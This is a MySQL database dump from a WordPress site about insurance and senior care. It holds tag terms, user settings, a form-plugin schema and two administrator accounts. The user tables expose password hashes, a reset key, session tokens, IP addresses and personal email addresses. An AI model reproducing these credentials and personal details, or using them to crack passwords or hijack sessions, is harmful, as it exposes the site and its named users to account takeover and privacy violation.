INSERT INTO `wpfi_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Divi','divi',0),(3,'layout','layout',0),(4,'Main','main',0),(5,'Articles','articles',0),(6,'Senior','senior',0),(7,'Care','care',0),(8,'Graded','graded',0),(9,'Death','death',0),(10,'Benefit','benefit',0),(11,'Whole Life','whole-life',0),(12,'Insurance','insurance',0),(13,'Policy','policy',0),(14,'Accidental','accidental',0),(15,'accidental death','accidental-death',0),(16,'Health','health',0),(17,'Study','study',0),(18,'Foods','foods',0),(19,'Brain','brain',0),(20,'contamination','contamination',0),(21,'food','food',0),(22,'poisoning','poisoning',0),(23,'Mortgage','mortgage',0),(24,'Mortgage Protection Insurance','mortgage-protection-insurance',0),(25,'MPI','mpi',0),(26,'PMI','pmi',0),(27,'Life','life',0),(28,'Family','family',0),(29,'Term life','term-life',0),(30,'Income','income',0),(31,'Education','education',0),(32,'Funeral','funeral',0),(33,'Expenses','expenses',0),(34,'Life Insuance','life-insuance',0),(35,'Future','future',0),(36,'Coverage','coverage',0),(37,'Life Insurance','life-insurance',0),(38,'Assets','assets',0),(39,'Increase','increase',0),(40,'Value','value',0),(41,'Medicare','medicare',0),(42,'Healthcare','healthcare',0),(43,'Part A','part-a',0),(44,'Part B','part-b',0),(45,'Supplement','supplement',0),(46,'Advantage','advantage',0),(47,'Beneficiary','beneficiary',0),(48,'Estate','estate',0),(49,'Tip','tip',0),(50,'Stroke','stroke',0),(51,'Be Fast','be-fast',0),(52,'Memory','memory',0),(53,'Symtoms','symtoms',0),(54,'Veteran','veteran',0),(55,'Vet','vet',0),(56,'Military','military',0),(57,'Child','child',0),(58,'Children','children',0),(59,'Tips','tips',0),(60,'Safety','safety',0),(61,'Halloween','halloween',0),(62,'Grandchild','grandchild',0),(63,'Grandchildren','grandchildren',0),(64,'Permanent Life','permanent-life',0),(65,'Millennial','millennial',0),(66,'Gen Z','gen-z',0),(67,'Credit Score','credit-score',0),(68,'Financial','financial',0),(69,'Payments','payments',0),(70,'Real Estate','real-estate',0),(71,'Budget','budget',0),(72,'Finances','finances',0),(73,'Burial','burial',0),(74,'Payment','payment',0),(75,'Payout','payout',0),(76,'Whole','whole',0),(77,'Term','term',0),(78,'Money','money',0),(79,'Savings','savings',0),(80,'Save','save',0),(81,'Scholarships','scholarships',0),(82,'Grants','grants',0),(83,'Organizations','organizations',0),(84,'Student','student',0),(85,'Debt','debt',0),(86,'Borrow','borrow',0),(87,'Loan','loan',0),(88,'Layering','layering',0),(89,'Multiple Policies','multiple-policies',0),(90,'Summer','summer',0),(91,'Zika virus','zika-virus',0),(92,'Natural','natural',0),(93,'Mosquito','mosquito',0),(94,'Repellants','repellants',0),(95,'Bill','bill',0),(96,'Credit','credit',0),(97,'Score','score',0),(98,'Report','report',0),(99,'Water','water',0),(100,'Life Style','life-style',0),(101,'not_global','not_global',0),(102,'section','section',0),(103,'regular','regular',0),(104,'Header','header',0),(105,'Header','header',0),(106,'Footer','footer',0),(107,'module','module',0),(108,'row','row',0);
/*!40000 ALTER TABLE `wpfi_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_usermeta`
--

DROP TABLE IF EXISTS `wpfi_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=95 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_usermeta`
--

LOCK TABLES `wpfi_usermeta` WRITE;
/*!40000 ALTER TABLE `wpfi_usermeta` DISABLE KEYS */;
INSERT INTO `wpfi_usermeta` VALUES (1,1,'nickname','TechSpt'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','ectoplasm'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpfi_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpfi_user_level','10'),(14,1,'dismissed_wp_pointers','theme_editor_notice'),(15,1,'show_welcome_panel','0'),(29,1,'session_tokens','a:1:{s:64:\"f4b7d5e387cf0c87fdde112f25e47ae5e0e22b0da820385c8a103b1572754593\";a:4:{s:10:\"expiration\";i:1681154342;s:2:\"ip\";s:13:\"67.198.116.43\";s:2:\"ua\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.34\";s:5:\"login\";i:1680981542;}}'),(17,1,'wpfi_dashboard_quick_press_last_post_id','685'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"67.198.116.0\";}'),(25,1,'meta-box-order_post','a:3:{s:4:\"side\";s:82:\"submitdiv,et_settings_meta_box,postimagediv,categorydiv,tagsdiv-post_tag,formatdiv\";s:6:\"normal\";s:71:\"postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(26,1,'screen_layout_post','2'),(27,1,'closedpostboxes_post','a:0:{}'),(28,1,'metaboxhidden_post','a:4:{i:0;s:13:\"trackbacksdiv\";i:1;s:16:\"commentstatusdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),(19,1,'wpfi_persisted_preferences','a:3:{s:14:\"core/edit-post\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2023-03-19T03:40:20.808Z\";s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}}'),(20,1,'wpfi_user-settings','imgsize=large&libraryContent=browse&align=center&hidetb=1&editor=tinymce&posts_list_mode=list&mfold=f'),(21,1,'wpfi_user-settings-time','1680984345'),(22,1,'managenav-menuscolumnshidden','a:3:{i:0;s:11:\"css-classes\";i:1;s:3:\"xfn\";i:2;s:11:\"description\";}'),(23,1,'metaboxhidden_nav-menus','a:5:{i:0;s:21:\"add-post-type-project\";i:1;s:12:\"add-post_tag\";i:2;s:15:\"add-post_format\";i:3;s:20:\"add-project_category\";i:4;s:15:\"add-project_tag\";}'),(24,1,'nav_menu_recently_edited','4'),(84,3,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(85,3,'metaboxhidden_nav-menus','a:5:{i:0;s:21:\"add-post-type-project\";i:1;s:12:\"add-post_tag\";i:2;s:15:\"add-post_format\";i:3;s:20:\"add-project_category\";i:4;s:15:\"add-project_tag\";}'),(51,3,'nickname','Melissa'),(52,3,'first_name','Melissa'),(53,3,'last_name','Jewett'),(54,3,'description',''),(55,3,'rich_editing','true'),(50,1,'gform_recent_forms','a:3:{i:0;s:1:\"2\";i:1;s:1:\"5\";i:2;s:1:\"1\";}'),(75,3,'metaboxhidden_post','a:4:{i:0;s:13:\"trackbacksdiv\";i:1;s:16:\"commentstatusdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),(76,3,'meta-box-order_post','a:3:{s:4:\"side\";s:82:\"et_settings_meta_box,submitdiv,postimagediv,categorydiv,tagsdiv-post_tag,formatdiv\";s:6:\"normal\";s:71:\"postexcerpt,trackbacksdiv,postcustom,commentstatusdiv,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(70,3,'community-events-location','a:1:{s:2:\"ip\";s:12:\"67.198.116.0\";}'),(69,3,'wpfi_dashboard_quick_press_last_post_id','914'),(68,3,'gform_recent_forms','a:2:{i:0;s:1:\"1\";i:1;s:1:\"2\";}'),(93,3,'session_tokens','a:1:{s:64:\"8465c58fc9b2fb380b4b70922b42aabc9ff11da770e383435927c337a8c3e026\";a:4:{s:10:\"expiration\";i:1682000769;s:2:\"ip\";s:13:\"67.198.116.43\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36\";s:5:\"login\";i:1681827969;}}'),(94,3,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:73:\"dashboard_site_health,dashboard_right_now,dashboard_activity,cerber_quick\";s:4:\"side\";s:58:\"rg_forms_dashboard,dashboard_quick_press,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(45,1,'_et_support_center_safe_mode','off'),(46,1,'_et_support_center_safe_mode_product',''),(63,3,'wpfi_user_level','10'),(64,3,'_crb_reg_','a:2:{s:2:\"IP\";s:13:\"67.198.116.43\";s:4:\"user\";i:1;}'),(65,3,'dismissed_wp_pointers',''),(66,3,'_crb_reg_','a:2:{s:2:\"IP\";s:13:\"67.198.116.43\";s:4:\"user\";i:1;}'),(56,3,'syntax_highlighting','true'),(57,3,'comment_shortcuts','false'),(58,3,'admin_color','fresh'),(59,3,'use_ssl','0'),(60,3,'show_admin_bar_front','true'),(61,3,'locale',''),(62,3,'wpfi_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(72,3,'wpfi_user-settings','hidetb=1&libraryContent=browse&align=left&editor=tinymce&imgsize='),(73,3,'wpfi_user-settings-time','1680532757'),(74,3,'closedpostboxes_post','a:2:{i:0;s:16:\"tagsdiv-post_tag\";i:1;s:9:\"formatdiv\";}'),(77,3,'screen_layout_post','2'),(86,1,'closedpostboxes_page','a:1:{i:0;s:11:\"postexcerpt\";}'),(87,1,'metaboxhidden_page','a:3:{i:0;s:16:\"commentstatusdiv\";i:1;s:7:\"slugdiv\";i:2;s:9:\"authordiv\";}'),(83,3,'nav_menu_recently_edited','4'),(82,3,'wpfi_media_library_mode','grid');
/*!40000 ALTER TABLE `wpfi_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_users`
--

DROP TABLE IF EXISTS `wpfi_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_users`
--

LOCK TABLES `wpfi_users` WRITE;
/*!40000 ALTER TABLE `wpfi_users` DISABLE KEYS */;
INSERT INTO `wpfi_users` VALUES (1,'TechSpt','$P$BM5/hYetiAPaqusC2oHfA06wgyX0jK0','techspt','terra@smcorridornews.com','http://cmdev-site1.com','2023-02-27 11:09:48','',0,'TechSpt'),(3,'Melissa','$P$BIOFJri.32SFf89n0PD0uYYMVfrBxa.','melissa','melissa@melissajewett.com','','2023-03-09 14:34:07','1678372448:$P$BNfd9t26oqXdTZG2AJZEcTR9aM/8Vo1',0,'Melissa Jewett');
/*!40000 ALTER TABLE `wpfi_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `title` text DEFAULT NULL,
  `description` text DEFAULT NULL,
  `mail_to` text DEFAULT NULL,
  `confirmation_mail_body` longtext DEFAULT NULL,
  `admin_email_body` longtext DEFAULT NULL,
  `confirmation_mail_subject` text DEFAULT NULL,
  `user_confirmation_mail_subject` text DEFAULT NULL,
  `from_address` text DEFAULT NULL,
  `from_name` text DEFAULT NULL,
  `on_screen_confirmation_message` longtext DEFAULT NULL,
  `on_screen_confirmation_message_admin` longtext DEFAULT NULL,
  `confirmation_page` text DEFAULT NULL,
  `form_fields` longtext DEFAULT NULL,
  `clean_html` longtext DEFAULT NULL,
  `visual_settings` text DEFAULT NULL,
  `google_analytics_conversion_code` text DEFAULT NULL,
  `colour_scheme` text DEFAULT NULL,
  `send_user_mail` text DEFAULT NULL,
  `user_email_field` text DEFAULT NULL,
  `on_form_submission` text DEFAULT NULL,
  `upload_settings` longtext DEFAULT NULL,
  `attachment_settings` longtext DEFAULT NULL,
  `date_sent` datetime DEFAULT NULL,
  `is_form` text DEFAULT NULL,
  `is_template` text DEFAULT NULL,
  `hidden_fields` longtext DEFAULT NULL,
  `form_hidden_fields` longtext DEFAULT NULL,
  `custom_url` text DEFAULT NULL,
  `post_type` text DEFAULT NULL,
  `post_action` text DEFAULT NULL,
  `bcc` text DEFAULT NULL,
  `bcc_user_mail` text DEFAULT NULL,
  `custom_css` longtext DEFAULT NULL,
  `is_paypal` text DEFAULT NULL,
  `total_views` text DEFAULT NULL,
  `time_viewed` text DEFAULT NULL,
  `email_on_payment_success` text DEFAULT NULL,
  `conditional_logic` longtext DEFAULT NULL,
  `conditional_logic_array` longtext DEFAULT NULL,
  `server_side_logic` longtext DEFAULT NULL,
  `form_status` text DEFAULT NULL,
  `currency_code` text DEFAULT NULL,
  `products` longtext DEFAULT NULL,
  `business` text DEFAULT NULL,
  `cmd` text DEFAULT NULL,
  `return_url` text DEFAULT NULL,
  `cancel_url` text DEFAULT NULL,
  `lc` text DEFAULT NULL,
  `environment` text DEFAULT NULL,
  `email_subscription` longtext DEFAULT NULL,
  `mc_field_map` longtext DEFAULT NULL,
  `mc_list_id` text DEFAULT NULL,
  `gr_field_map` longtext DEFAULT NULL,
  `gr_list_id` text DEFAULT NULL,
  `mp_field_map` longtext DEFAULT NULL,
  `mp_list_id` text DEFAULT NULL,
  `ms_field_map` longtext DEFAULT NULL,
  `ms_list_id` text DEFAULT NULL,
  `pdf_html` longtext DEFAULT NULL,
  `attach_pdf_to_email` text DEFAULT NULL,
  `form_to_post_map` longtext DEFAULT NULL,
  `is_form_to_post` text DEFAULT NULL,
  `md_theme` text DEFAULT NULL,
  `form_theme` text DEFAULT NULL,
  `jq_theme` text DEFAULT NULL,
  `form_style` longtext DEFAULT NULL,
  `msg_style` longtext DEFAULT NULL,
  `multistep_settings` longtext DEFAULT NULL,
  `multistep_html` longtext DEFAULT NULL,
  `paypal_client_Id` longtext DEFAULT NULL,
  `paypal_client_secret` longtext DEFAULT NULL,
  `payment_success_msg` longtext DEFAULT NULL,
  `payment_failed_msg` longtext DEFAULT NULL,
  `option_settings` longtext DEFAULT NULL,
  `form_type` text DEFAULT NULL,
  `template_type` text DEFAULT NULL,
  `draft_Id` text DEFAULT NULL,
  `kak` longtext DEFAULT NULL,
  `is_wrapped` text DEFAULT NULL,
  `entry_count` bigint(255) DEFAULT 0,
  `zapier_web_hook_url` longtext DEFAULT NULL,
  `reply_to` longtext DEFAULT NULL,
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms`
--

LOCK TABLES `wpfi_wap_nex_forms` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms` DISABLE KEYS */;
INSERT INTO `wpfi_wap_nex_forms` VALUES (2,NULL,0,'0000-00-00 00:00','Life Insurance Quote',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1','0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2023-03-03 16:14:29');
/*!40000 ALTER TABLE `wpfi_wap_nex_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms_email_templates`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms_email_templates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms_email_templates` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `nex_forms_Id` text DEFAULT NULL,
  `mail_type` text DEFAULT NULL,
  `mail_to` text DEFAULT NULL,
  `mail_body` longtext DEFAULT NULL,
  `mail_subject` text DEFAULT NULL,
  `from_address` text DEFAULT NULL,
  `from_name` text DEFAULT NULL,
  `send_user_mail` text DEFAULT NULL,
  `user_email_field` text DEFAULT NULL,
  `bcc` text DEFAULT NULL,
  `bcc_user_mail` text DEFAULT NULL,
  `attachments` text DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms_email_templates`
--

LOCK TABLES `wpfi_wap_nex_forms_email_templates` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_email_templates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_email_templates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms_entries`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms_entries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms_entries` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `nex_forms_Id` text DEFAULT NULL,
  `page` text DEFAULT NULL,
  `ip` text DEFAULT NULL,
  `hostname` text DEFAULT NULL,
  `city` text DEFAULT NULL,
  `region` text DEFAULT NULL,
  `country` text DEFAULT NULL,
  `loc` text DEFAULT NULL,
  `org` text DEFAULT NULL,
  `postal` text DEFAULT NULL,
  `user_Id` text DEFAULT NULL,
  `viewed` text DEFAULT NULL,
  `date_time` datetime DEFAULT NULL,
  `paypal_invoice` text DEFAULT NULL,
  `payment_status` text DEFAULT NULL,
  `form_data` longtext DEFAULT NULL,
  `paypal_data` longtext DEFAULT NULL,
  `paypal_payment_token` longtext DEFAULT NULL,
  `paypal_payment_id` longtext DEFAULT NULL,
  `payment_ammount` longtext DEFAULT NULL,
  `payment_currency` text DEFAULT NULL,
  `saved_admin_email` longtext DEFAULT NULL,
  `saved_user_email` longtext DEFAULT NULL,
  `saved_user_email_address` text DEFAULT NULL,
  `starred` text DEFAULT NULL,
  `trashed` text DEFAULT NULL,
  `attachments` text DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms_entries`
--

LOCK TABLES `wpfi_wap_nex_forms_entries` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_entries` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_entries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms_files`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms_files`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms_files` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `nex_forms_Id` text DEFAULT NULL,
  `name` text DEFAULT NULL,
  `type` text DEFAULT NULL,
  `size` text DEFAULT NULL,
  `url` text DEFAULT NULL,
  `location` text DEFAULT NULL,
  `entry_Id` text DEFAULT NULL,
  `trashed` text DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms_files`
--

LOCK TABLES `wpfi_wap_nex_forms_files` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_files` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_files` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms_stats_interactions`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms_stats_interactions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms_stats_interactions` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `nex_forms_Id` text DEFAULT NULL,
  `time_interacted` text DEFAULT NULL,
  `date_time` datetime DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms_stats_interactions`
--

LOCK TABLES `wpfi_wap_nex_forms_stats_interactions` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_stats_interactions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_stats_interactions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_wap_nex_forms_views`
--

DROP TABLE IF EXISTS `wpfi_wap_nex_forms_views`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_wap_nex_forms_views` (
  `Id` bigint(255) unsigned NOT NULL AUTO_INCREMENT,
  `plugin` varchar(255) DEFAULT NULL,
  `publish` int(1) unsigned DEFAULT 0,
  `added` varchar(18) DEFAULT '0000-00-00 00:00',
  `last_update` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `nex_forms_Id` text DEFAULT NULL,
  `time_viewed` text DEFAULT NULL,
  `date_time` datetime DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_wap_nex_forms_views`
--

LOCK TABLES `wpfi_wap_nex_forms_views` WRITE;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_views` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_wap_nex_forms_views` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2023-04-19 10:20:40
